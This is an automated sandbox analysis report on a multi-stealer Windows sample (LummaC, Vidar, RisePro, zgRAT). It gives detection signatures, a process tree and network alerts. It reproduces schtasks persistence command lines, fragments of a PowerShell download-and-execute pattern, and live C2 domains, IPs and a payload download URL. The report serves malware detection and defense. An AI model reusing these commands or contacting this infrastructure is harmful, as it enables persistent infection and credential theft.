Edit tour

Windows Analysis Report
zyJWi2vy29.exe

Overview

General Information

Sample name:	zyJWi2vy29.exe renamed because original name is a hash value
Original sample name:	97768ab0a4837757b74de2ae892badab.exe
Analysis ID:	1465070
MD5:	97768ab0a4837757b74de2ae892badab
SHA1:	d8bdfdb717b64ee4cd7a892bbddd293f7eaf915c
SHA256:	0f88ea51a56da966d12311a4b20ea3a6c44315e00747a589f19cf535f90ced77
Tags:	32exetrojan
Infos:

Detection

LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RisePro Stealer

Yara detected Vidar stealer

Yara detected zgRAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Creates multiple autostart registry keys

Found API chain indicative of sandbox detection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

zyJWi2vy29.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\zyJWi2vy29.exe" MD5: 97768AB0A4837757B74DE2AE892BADAB)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7632 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 7908 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7956 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

6p7a7injLZJojhETBNhL.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe" MD5: 97768AB0A4837757B74DE2AE892BADAB)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 4908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 8084 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8144 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8x9h3ctqkpfTu0sNF0X2.exe (PID: 7268 cmdline: "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe" MD5: F88272EA7674D3ACEDD8ADCF7643C598)

RegAsm.exe (PID: 7236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 6100 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1136 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3f61nAONpe1PsLC0oJHy.exe (PID: 7632 cmdline: "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe" MD5: 0309DD0131150796EA99B30A62194FAE)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 136 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 7868 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7992 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8jZLXI789L2zXDjlm7Fx.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe" MD5: 2FCB3543D06F526E93C7276356F557B7)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 324 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MSIUpdaterV168.exe (PID: 8076 cmdline: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe MD5: 97768AB0A4837757B74DE2AE892BADAB)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSIUpdaterV168.exe (PID: 8096 cmdline: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe MD5: 97768AB0A4837757B74DE2AE892BADAB)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSIUpdaterV168.exe (PID: 7560 cmdline: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe MD5: 0309DD0131150796EA99B30A62194FAE)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSIUpdaterV168.exe (PID: 2504 cmdline: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe MD5: F88272EA7674D3ACEDD8ADCF7643C598)

RegAsm.exe (PID: 2656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSIUpdaterV168.exe (PID: 7744 cmdline: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe MD5: F88272EA7674D3ACEDD8ADCF7643C598)

RegAsm.exe (PID: 3720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSIUpdaterV168.exe (PID: 7988 cmdline: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe MD5: 0309DD0131150796EA99B30A62194FAE)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSIUpdaterV168.exe (PID: 8028 cmdline: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe MD5: 2FCB3543D06F526E93C7276356F557B7)

conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSIUpdaterV168.exe (PID: 2180 cmdline: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe MD5: 2FCB3543D06F526E93C7276356F557B7)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45583:$s1: file:/// 0x454df:$s2: {11111-22222-10009-11112} 0x45513:$s3: {11111-22222-50001-00000} 0x42421:$s4: get_Module 0x3cc2b:$s5: Reverse 0x3d93f:$s6: BlockCopy 0x3cbea:$s7: ReadByte 0x45595:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45583:$s1: file:/// 0x454df:$s2: {11111-22222-10009-11112} 0x45513:$s3: {11111-22222-50001-00000} 0x42421:$s4: get_Module 0x3cc2b:$s5: Reverse 0x3d93f:$s6: BlockCopy 0x3cbea:$s7: ReadByte 0x45595:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45583:$s1: file:/// 0x454df:$s2: {11111-22222-10009-11112} 0x45513:$s3: {11111-22222-50001-00000} 0x42421:$s4: get_Module 0x3cc2b:$s5: Reverse 0x3d93f:$s6: BlockCopy 0x3cbea:$s7: ReadByte 0x45595:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\Wb7RPsmWU0j98XyD1Ncm8BU.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45583:$s1: file:/// 0x454df:$s2: {11111-22222-10009-11112} 0x45513:$s3: {11111-22222-50001-00000} 0x42421:$s4: get_Module 0x3cc2b:$s5: Reverse 0x3d93f:$s6: BlockCopy 0x3cbea:$s7: ReadByte 0x45595:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 8 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000002E.00000000.1886815779.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 8188	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x13fb4:$x1: powershell.exe -nop -c "iex 0x13fdb:$a1: Net.WebClient).DownloadString 0x144da:$a1: Net.WebClient).DownloadString
Process Memory Space: RegAsm.exe PID: 7236	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7236	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7236	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSIUpdaterV168.exe PID: 2504	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSIUpdaterV168.exe PID: 2504	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSIUpdaterV168.exe PID: 2504	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x96bd:$x1: powershell.exe -nop -c "iex 0x96e4:$a1: Net.WebClient).DownloadString 0x9be3:$a1: Net.WebClient).DownloadString
Process Memory Space: MSIUpdaterV168.exe PID: 7744	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSIUpdaterV168.exe PID: 7744	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSIUpdaterV168.exe PID: 7744	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x593c:$x1: powershell.exe -nop -c "iex 0x5963:$a1: Net.WebClient).DownloadString 0x5e62:$a1: Net.WebClient).DownloadString
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
46.0.MSIUpdaterV168.exe.f50000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
46.0.MSIUpdaterV168.exe.f50000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
46.0.MSIUpdaterV168.exe.f50000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45583:$s1: file:/// 0x454df:$s2: {11111-22222-10009-11112} 0x45513:$s3: {11111-22222-50001-00000} 0x42421:$s4: get_Module 0x3cc2b:$s5: Reverse 0x3d93f:$s6: BlockCopy 0x3cbea:$s7: ReadByte 0x45595:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
34.2.MSIUpdaterV168.exe.4c0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
36.2.MSIUpdaterV168.exe.4c0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
22.2.8x9h3ctqkpfTu0sNF0X2.exe.e30000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7624, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea

Snort Signatures

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:35.352447
SID:	2046266
Source Port:	50500
Destination Port:	49802
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:07.227239
SID:	2046266
Source Port:	50500
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:07.459810
SID:	2046267
Source Port:	50500
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:32.178451
SID:	2046266
Source Port:	50500
Destination Port:	49787
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 77.105.132.27

Timestamp:	07/01/24-09:16:06.660397
SID:	2049060
Source Port:	49747
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 77.105.132.27

Timestamp:	07/01/24-09:16:13.442392
SID:	2046269
Source Port:	49747
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:20.238290
SID:	2046266
Source Port:	50500
Destination Port:	49756
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 77.105.132.27 - Destination IP: 192.168.2.4

Timestamp:	07/01/24-09:16:32.076820
SID:	2046266
Source Port:	50500
Destination Port:	49786
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zyJWi2vy29.exe

Avira: detected

Antivirus detection for URL or domain

Source: contintnetksows.shop	Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/	Avira URL Cloud: Label: malware
Source: http://77.105.132.27/rise2806.exe	Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/apiB	Avira URL Cloud: Label: malware
